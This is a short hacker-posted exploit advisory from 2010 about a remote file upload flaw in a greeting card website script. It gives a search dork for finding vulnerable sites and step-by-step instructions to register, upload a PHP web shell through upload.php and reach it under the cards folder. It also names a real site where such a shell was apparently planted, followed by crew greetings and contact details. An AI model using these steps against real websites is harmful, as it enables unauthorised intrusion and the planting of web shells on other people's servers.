# Exploit Title: [greeting card Remote Upload Vulnerability] # Date: [04/06/2010] # Author: [Mr.Benladen] # Software Link: [N/A] # Version: [2004/2008] # Tested on: [Linux/unix] # CVE : [if exists] # Code : [N/A] #Email : MaFiadu48@hotmail.fr ############################## ######################################################################## # # # # # # # # # # # # # ## #### ## # ## ## ###### ## ## ## ## ###### ## ## ## ## #### ## ## ### ############ ### ######################## Mr.Benladen cr3w ############## ######## ########## ####### ### ## ########## ## ### ### ## ########## ## ### ### # ########## # ### ### ## ######## ## ### ## # ###### # ## ## # #### # ## ## ## ###################################################################################################### [Dork ]: "Send amazing greetings to your friends and relative!" {exploit} : http://127.0.0.1/upload.php First register and the site and go to upload cards After you have uploaded your shells , you will find it in this Path : http://[site]//cards/id_thumb_evil.php demo : http://www.freegreetingcardshome.com/cards/1275663706_thumb_oujda.php ###################################################################################################### Greetz To : Federal7-blackroot-khalidmoro-ra3ch-yesmouh-Zi00n From Ukrania-Dr.Prorat all My Friend and al muslim h4x0r M0r0Can Is Here --=-=-=-=-www.Joomlaservice.info or www.dz4all.com -=-=-=-=--=